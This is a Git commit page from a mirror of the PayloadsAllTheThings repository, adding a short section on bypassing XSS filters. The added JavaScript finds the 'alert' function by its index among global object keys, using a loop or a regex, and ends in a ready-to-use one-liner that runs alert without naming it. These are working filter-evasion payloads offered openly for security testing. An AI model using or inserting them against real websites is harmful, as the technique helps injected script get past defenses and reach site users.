mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Merge pull request #130 from clem9669/patch-3
Bypass XSS filters on alert
This commit is contained in:
commit
21101ec287
1 changed files with 33 additions and 1 deletions
|
@ -679,6 +679,38 @@ content['alert'](6)
|
||||||
[12].forEach(alert);
|
[12].forEach(alert);
|
||||||
```
|
```
|
||||||
|
|
||||||
|
From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables
|
||||||
|
|
||||||
|
The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**.
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
|
||||||
|
// 5
|
||||||
|
```
|
||||||
|
|
||||||
|
Then calling alert is :
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
Object.keys(self)[5]
|
||||||
|
// "alert"
|
||||||
|
self[Object.keys(self)[5]]("1") // alert("1")
|
||||||
|
```
|
||||||
|
|
||||||
|
We can find "alert" with a regular expression like ^a[rel]+t$ :
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()
|
||||||
|
|
||||||
|
// then you can use a() with Object.keys
|
||||||
|
|
||||||
|
self[Object.keys(self)[a()]]("1") // alert("1")
|
||||||
|
```
|
||||||
|
|
||||||
|
Oneliner:
|
||||||
|
```javascript
|
||||||
|
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
|
||||||
|
```
|
||||||
|
|
||||||
From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet.
|
From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet.
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
|
Loading…
Reference in a new issue